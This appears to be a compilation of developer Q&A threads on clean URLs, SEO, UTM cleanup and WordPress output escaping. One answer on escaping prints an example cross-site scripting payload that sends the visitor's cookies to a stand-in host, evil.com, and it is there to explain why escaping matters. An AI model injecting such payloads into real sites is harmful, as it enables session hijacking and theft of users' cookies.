concrete5 search results page URL

The concrete5 search results page URL contains some parameters. How can I remove those parameters and make the URL user-friendly?

On an Apache server, I recommend using the mod_rewrite module and its RewriteEngine.
With this module you can define aliases for internal URLs (including ones with parameters), and you can use regular expressions in the rules.
RewriteEngine on Wikipedia
mod_rewrite tutorial
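For example, a minimal .htaccess sketch (the /search path and the query parameter name here are assumptions, not concrete5 specifics):

```apache
RewriteEngine On
# Map /search/some-term to the parameterized URL the CMS expects
RewriteRule ^search/([^/]+)/?$ /search?query=$1 [L,QSA]
```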

Short answer: it's probably not worth the trouble.
Long answer...
I'm guessing you see three query parameters when using the search block:
query
search_paths[]
submit
The first parameter is required to make the searches work, but the other two can be dropped. When I build concrete5 themes, I usually "hard-code" the HTML for the search form, so that I can control which parameters are sent (basically, don't provide a "name" to the submit button, and don't include a "search_paths" hidden field).
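For instance, a hand-coded form along these lines submits only the query parameter (the action path is illustrative):

```html
<form method="get" action="/search">
  <input type="text" name="query" />
  <!-- no name attribute, so no "submit" parameter is sent -->
  <input type="submit" value="Search" />
</form>
<!-- note: no search_paths[] hidden field -->
```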
The "query" parameter, though, is not going to be easy to get rid of. The problem is that for a search, you're supposed to have a parameter like that in the URL. You could work around this by using javascript -- when the search form is submitted, use some jquery to rewrite the request so it puts that parameter at the end of the URL (for example, http://example.com/search?query=test becomes http://example.com/search/test). Then, as #tuxtimo suggests, you add a rewrite rule to your .htaccess file to take that last piece of the URL and treat it as the ?query parameter that the system expects. But this won't work if the user doesn't have javascript enabled (and hence probably not for Googlebot either, which means that this won't really serve you any SEO purpose -- which I further imagine is the real reason you're asking this question to begin with).
Also, you will run into a lot of trouble if you ever add another page under the page that you show the search results on (because you have the rewrite rule that treats everything after the top-level search page path as a search parameter -- so you can never actually reach an address that exists below that path).
So I'd just make a nice clean search form that only sends the ?query parameter and leave it at that -- I don't think those are really that much less user-friendly than /search-term would be.

Related

Is there a preferred canonical form for the path part of URLs?

All of these URLs are equivalent:
http://rbutterworth.nfshost.com/Me
http://rbutterworth.nfshost.com/Me/
http://rbutterworth.nfshost.com/Me/.
http://rbutterworth.nfshost.com/Me/index
http://rbutterworth.nfshost.com/Me/index.html
The "rel='canonical'" link allows me to specifiy whichever I want.
Is one of those forms considered "better" or "more standard" than the others?
As a maintainer, I personally prefer the first one, as it allows me the freedom to change "Me" to be "Me.php", or change "index.html" to be "index.shtml", or some other form should I ever need to, without having to define redirects, or to change any existing links to this URL. (This isn't specific to "index"; it could be for any web page.)
I.e. using that simplest form avoids publishing what is only an implementation detail that is best hidden from the users.
Unfortunately, of all the forms, my preferred choice is the only one that web servers don't like; they return "HTTP/1.1 301 Moved Permanently" and add the trailing "/".
For directories, is incurring this redirection penalty worth it?
For non-directories, is there any reason I shouldn't continue omitting the suffix?
Added after receiving the answer:
It's nice to know I'm not the only one that thinks omitting suffixes is a good idea.
And I just realized that my problem with directories goes away if I use "directoryname/index" as the canonical form.
Thanks.
For directories, is incurring this redirection penalty worth it?
No.
"The canonical URL for this resource is a 301 redirect to another URL" doesn't make sense.
For non-directories, is there any reason I shouldn't continue omitting the suffix?
No.
There is a reason to omit the suffix: it leaks information about the technologies used to build the site, and makes it harder to change them (i.e. if you moved away from static HTML files to a PHP-based system, you'd need to redirect all your old URLs … or configure your server to process files with a .html extension as PHP, which is possible but confusing).
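On Apache, one way to serve the suffix-less form directly (avoiding the redirect) is content negotiation; a minimal sketch, assuming mod_negotiation is available:

```apache
# .htaccess: with MultiViews enabled, a request for /Me/index is answered
# by Me/index.html (or index.php, etc.) without a 301 redirect
Options +MultiViews
```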

How to check if any URLs within my website contain specific Google Analytics UTM codes?

The website I manage uses Google Analytics to track URLs. Recently I found out that some of the URLs contain UTM codes that should not be there. I need some way of determining whether URLs containing the UTM codes utm_source=redirect or utm_source=redirectfolder are currently on the website and being redirected within the same site. If so, I will need to remove the UTM codes from those URLs, because Google Analytics automatically tracks URLs that redirect within the same domain, so it does not require UTM codes (and they actually hurt the analytics).
My apologies if I sound a little broken here; I am still trying to understand it all myself, as I am a new graduate with a CS degree and now the only web developer. I am not asking anyone to write this for me, just whether I could be pointed in the right direction for writing a ColdFusion script that may help with this.
So if I understand correctly, your codebase is riddled with problematic URLs. To clean up the URLs programmatically you'll need to do a couple of things up front.
Identify the query string parameter variable/value pair that needs to be eliminated.
Create a worker file to access all your .cfm and .cfc files (of interest).
Create a loop that goes through the directories and reads, edits, and saves your files (be careful here: consider writing to a new file name rather than overwriting the originals, unless you are sure).
Create a find/replace function or regex to target and remove your troublesome parameters.
Save your file and move on in the loop.
OR:
You can use an IDE like Dreamweaver or Sublime Text to locate these via a regex search, then spot-check and remove them.
I would selectively remove the URL parameters, but if you have so many pages that it makes no sense, then programmatic removal would be the way to go.
You will be using cfdirectory, cffile, and either reMatch() (building an array and rebuilding the string) or a find/replace with replaceNoCase().
Your cfdirectory call returns a query-like result that you can loop over just as you would a normal query with cfoutput.
Pull one or two files out of your repo to develop your code against until you are comfortable. I would code in exit strategies (fail gracefully), like adding a locatable comment at each change spot so you can check it manually later, or escaping out if a file won't write, and many other try/catch opportunities.
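A minimal cfscript sketch of that loop (recent ColdFusion; the directory path, file filter, and backup convention are assumptions):

```cfml
<cfscript>
// Gather candidate templates, recursively
files = directoryList(expandPath("."), true, "path", "*.cfm|*.cfc");
for (f in files) {
    content = fileRead(f);
    // Remove the parameter when other parameters follow it...
    cleaned = reReplaceNoCase(content, "utm_source=redirect(folder)?&", "", "all");
    // ...and when it is the last (or only) parameter
    cleaned = reReplaceNoCase(cleaned, "[?&]utm_source=redirect(folder)?", "", "all");
    if (cleaned neq content) {
        fileWrite(f & ".bak", content); // keep the original rather than overwrite blindly
        fileWrite(f, cleaned);
    }
}
</cfscript>
```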
I hope this helps.

Why must I escape data prior to rendering it for the end user in WordPress?

I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not, you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript; if you do not escape it, user-set JavaScript could be output to the page and executed (rather than simply displayed, as it is on StackOverflow).
E.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML, such as: <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to evil.com, passing along all cookies (which could include the user's session ID, compromising their session via session hijacking). However, this is often done in a more subtle fashion so the user is not aware they are being attacked, such as setting the URL of an <img> tag to pass along the cookies, or even embedding a keylogger within the page.
Escaping needs to be done per output context, so it must be done on output rather than on input. Examples of output contexts are HTML, JavaScript, and CSS, and each has its own escaping (encoding) rules that must be followed to ensure your output is safe. E.g. & in HTML is &amp;, whilst in JavaScript it should be encoded as \x26. This ensures the character is interpreted by the language as the literal rather than as a control character.
Please see the OWASP XSS Prevention Cheat Sheet for more details.
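For example, WordPress ships an escaping helper per output context; a quick sketch in a theme template (the variables are illustrative):

```php
<?php
// HTML body context
echo esc_html( $title );

// HTML attribute context
echo '<input type="text" value="' . esc_attr( $value ) . '">';

// URL context (href, src)
echo '<a href="' . esc_url( $link ) . '">Read more</a>';

// Inline JavaScript context
echo '<script>var msg = "' . esc_js( $message ) . '";</script>';
```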
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps ensure you're not letting someone inject anything unwanted into your page.
It's not as huge a risk as forgetting input validation (well, okay, maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross-site scripting. This article does a nice job of giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/

Is static URL better than dynamic URL in terms of SERP?

I've been reading up on SEO and how to construct my links in terms of getting better SERP.
I'm using WordPress as the framework for my site and have custom templates retrieving data from my DB.
What makes a URL dynamic is the usage of ? and &. Nothing more, nothing less. Google recommends that I should not have too many attributes in my URL, and that's understandable.
Dynamic: www.mysite.com/?id=123&name=some+store+name&city=london
Static: www.mysite.com/london/some+store+name/123
Q1: I don't feel that adding the store ID in this static URL looks nice. But I do need it in order to fetch data from the DB, right?
Reading various blogs, I see many SEO (experts) saying different things, but I feel most of it is just talk without actually proving their statements. We can all agree that static URLs are good in terms of usability (and readability).
Q2: But many claim that static URLs prevent duplicate content. I don't agree on that as all my contents have unique ID. Can anyone comment on this?
Q3: In the end, for the Google search engine (and others) it really doesn't matter if the URL is static or dynamic. But since Google is working towards user friendly content, is that the only argument for having static URLs?
1) There's no problem using DB ids alongside static URLs. Many huge e-commerce and other commercial sites do this (Amazon, eBay... hell, everyone really.)
2) A static URL in and of itself does not prevent duplicate content. There are hundreds of ways duplicates can happen (child pages, external copy, javascript, form fields, ajax, archive sections... the list goes on.)
3) It doesn't matter if it's static or dynamic for indexing. But in terms of ranking well, static URLs containing informative keywords (relevant to the targeted search terms) are hugely beneficial. Multivariate testing I've done shows users are also generally reassured by clean-looking URLs in terms of usability.
If you give me some more examples, I can probably help out a bit more.
URLs without parameters are always better. It won't absolutely kill SEO, but it is better not to have them.
10 years ago Google would ignore parameters and would penalize you for URLs with parameters. Today they are really good at figuring out these DB parameters, but not perfect. Among other things, Google has to figure out which URL parameters matter, which don't, and whether parameter order matters.
E.g. you may have URL parameters that store user preferences, navigation state etc. This will just proliferate URLs that Google has to try to decode. So what you should do is:
Right before generating a URL, at least sort your parameters.
Convert parameters that matter into things that don't look like parameters. So if I had a shoe store with URLs like http://mystore.com/mypage?category=boots&brand=great&color=red I'd rewrite that to something like http://mystore.com/mypage/category/boots/brand/great/color/red or even better:
http://mystore.com/mypage/boots/great/red
Then you can add the parameters that don't matter for the page content at the end. Google will figure out they don't matter.
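A hedged .htaccess sketch of that rewrite, using the hypothetical shoe-store URLs above:

```apache
RewriteEngine On
# /mypage/boots/great/red -> /mypage?category=boots&brand=great&color=red
# [QSA] re-appends any leftover "don't matter" parameters afterwards
RewriteRule ^mypage/([^/]+)/([^/]+)/([^/]+)/?$ /mypage?category=$1&brand=$2&color=$3 [L,QSA]
```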
The other reason to fix your URLs is that Google displays them to users in the SERPs, and people are more likely to click on readable URLs than database URLs.
Why do big stores like Amazon use database URLs? Because they are giant, bad URLs don't hurt them, and their systems are so large and complex that it is the only way to manage them. But for smaller sites with fewer products, readable URLs are achievable and are one of the few advantages a small site can have over a big one.
If you observe Google SERP results closely, you will notice that parts of them are highlighted in bold. Looking further, you can see that the search query gets highlighted in the title, description, and URL of results whose title, description, and URL contain those same words.
The thing is, if a website's URLs are dynamic and carry a parameter ID, they lose those keyword matches in the URL.
Ex:
http://www.johnzaccheofineart.com/catagory-2/?id=4
http://www.johnzaccheofineart.com/painting/johnzaccheo
Sample Search : Painting for Sale
Now we can easily see the difference between static and dynamic URL performance: one URL contains a word with no search value, while the other contains the category name as well as the painter's name.
So, as a user, I would give preference to the second one, which is understandable from the URL itself.

Is it old-fashioned to use a query string for an id?

I am curious whether it is out of date to use a query string for an id. We have a web app running on .NET 2.0. When we display the detail of something (say, a product) we use a query string like this: http://www.somesite.com/Shop/Product/Detail.aspx?ProductId=100
We use the query string so that the user can save the link somewhere and come back any time later. I suppose we will use URL rewriting sooner or later, but in the meantime I would like to know your opinion. Thanks. Cheers, X.
A common strategy is to use an item ID in the URL, coupled with some keywords that describe the item. This is good from a user's perspective, because they can easily see what a URL refers to if they save it somewhere. More importantly, it's useful from a SEO (Search Engine Optimisation) point of view, as search engines will - it is said - rate a given URL more highly if it contains the keywords someone is searching for.
You can see this approach on this very site, where the ID after 'questions' is used for the database query and the text is purely for the benefit of users and search engines.
Whether you use a straightforward query string, or a more advanced approach that makes the ID look like part of the folder path, is up to you. It's largely a matter of personal taste.
Yes, it is old-fashioned!
However, if you are thinking about changing it to a RESTful implementation as others have suggested, then you should continue to support the old URL and query string addresses by implementing an HTTP 301 redirect from the query string URLs to the new RESTful URLs. This will ensure that users' old links and bookmarks continue to work, while telling the search engine bots that the URL has changed.
Since your post is tagged ASP.NET, there is a good write-up on how you can support both using the new ASP.NET routing mechanism: http://msdn.microsoft.com/en-us/magazine/dd347546.aspx
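A hedged sketch of both halves; MapPageRoute and RedirectPermanent are .NET 4 APIs (on 2.0 you would set the 301 status and Location header manually), and the route pattern and names are illustrative:

```csharp
// Global.asax.cs: route the friendly URL to the existing Web Forms page
void Application_Start(object sender, EventArgs e)
{
    System.Web.Routing.RouteTable.Routes.MapPageRoute(
        "ProductDetail",
        "Shop/Product/{id}/{slug}",
        "~/Shop/Product/Detail.aspx");
}

// Detail.aspx.cs: 301-redirect legacy query string requests to the new URL
protected void Page_Load(object sender, EventArgs e)
{
    string legacyId = Request.QueryString["ProductId"];
    if (legacyId != null)
    {
        // "product-name" stands in for a slug looked up from the database
        Response.RedirectPermanent("/Shop/Product/" + legacyId + "/product-name");
    }
}
```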
Nothing wrong with query string parameters. They are simple to create and understand. A lot of sites use fancy URLs like www.somesite.com/Shop/Product/white_sox_t_shirt, which is cool and sort of user-friendly, but more work for us poor developers.
Using query strings is not outdated at all; they just have to be used in the right places. However, never place anything in the query string that could be a security issue, and remember that anything you read from the query string could have been modified, so validate all input.
It's not outdated, but another alternative is a more RESTful approach:
yourwebsite.com/products/100/usb-coffee-maker
The reason is that a) search engines usually ignore any URL with a query string (so the product.aspx?id=100 page may never get indexed) and b) having the name in the URL purely for display purposes supposedly helps SEO as well.
Permanent links are best for SEO. Also, what if your product moved to another database and its ID needed to change?
I don't think there is much chance that a product's name or its manufacturer will change.
E.g. Apple/iPhone won't change :) That seems to me a good permalink.
